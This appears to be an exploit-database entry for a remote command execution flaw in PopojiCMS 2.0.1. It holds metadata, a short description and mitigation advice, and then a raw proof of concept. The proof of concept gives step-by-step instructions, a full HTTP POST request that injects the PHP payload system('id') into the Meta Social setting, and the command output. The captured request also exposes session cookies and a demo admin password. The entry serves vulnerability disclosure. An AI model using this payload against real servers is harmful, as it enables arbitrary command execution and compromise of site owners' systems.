PopojiCMS Version 2.0.1 Remote Command Execution

vendor:

PopojiCMS

by:

tmrswrr

6.1

CVSS

HIGH

Remote Command Execution

CWE

Product Name: PopojiCMS

Affected Version From: 2.0.1

Affected Version To: 2.0.1

Patch Exists: NO

Related CWE: CVE-2023-XXXX (Not provided in the text)

CPE: a:popojicms:popojicms:2.0.1

Metasploit:

Other Scripts: https://www.infosecmatter.com/why-your-exploit-completed-but-no-session-was-created-try-these-fixes/, https://www.infosecmatter.com/nessus-plugin-library/?id=143961, https://www.infosecmatter.com/nessus-plugin-library/?id=75129

Platforms Tested: Linux

2023

PopojiCMS Version 2.0.1 Remote Command Execution

PopojiCMS version 2.0.1 is vulnerable to remote command execution. By injecting a malicious payload into the Meta Social section under settings, an attacker can execute arbitrary commands on the server. This can lead to unauthorized access and potential data breaches. The exploit allows an attacker to execute system commands, as demonstrated by the payload '<?php echo system('id'); ?>'.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user inputs and validate data before processing it. Additionally, access controls should be implemented to prevent unauthorized users from accessing sensitive functionalities.

Source

Exploit-DB raw data:

# Exploit Title: PopojiCMS Version : 2.0.1  Remote Command Execution
# Date: 27/11/2023
# Exploit Author: tmrswrr
# Vendor Homepage: https://www.popojicms.org/
# Software Link: https://github.com/PopojiCMS/PopojiCMS/archive/refs/tags/v2.0.1.zip
# Version: Version : 2.0.1
# Tested on: https://www.softaculous.com/apps/cms/PopojiCMS

##POC:

1 ) Login with admin cred and click settings
2 ) Click on config , write your payload in Meta Social > <?php echo system('id'); ?>
3 ) Open main page , you will be see id command result 


POST /PopojiCMS9zl3dxwbzt/po-admin/route.php?mod=setting&act=metasocial HTTP/1.1
Host: demos5.softaculous.com
Cookie: _ga_YYDPZ3NXQQ=GS1.1.1701095610.3.1.1701096569.0.0.0; _ga=GA1.1.386621536.1701082112; AEFCookies1526[aefsid]=3cbt9mdj1kpi06aj1q5r8yhtgouteb5s; PHPSESSID=b6f1f9beefcec94f09824efa9dae9847; lang=gb; demo_563=%7B%22sid%22%3A563%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22password%22%2C%22url%22%3A%22http%3A%5C%2F%5C%2Fdemos5.softaculous.com%5C%2FPopojiCMS9zl3dxwbzt%22%2C%22adminurl%22%3A%22http%3A%5C%2F%5C%2Fdemos5.softaculous.com%5C%2FPopojiCMS9zl3dxwbzt%5C%2Fpo-admin%5C%2F%22%2C%22dir_suffix%22%3A%229zl3dxwbzt%22%7D
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://demos5.softaculous.com/PopojiCMS9zl3dxwbzt/po-admin/admin.php?mod=setting
Content-Type: application/x-www-form-urlencoded
Content-Length: 58
Origin: https://demos5.softaculous.com
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

meta_content=%3C%3Fphp+echo+system%28%27id%27%29%3B+%3F%3E

Result: 

uid=1000(soft) gid=1000(soft) groups=1000(soft) uid=1000(soft) gid=1000(soft) groups=1000(soft)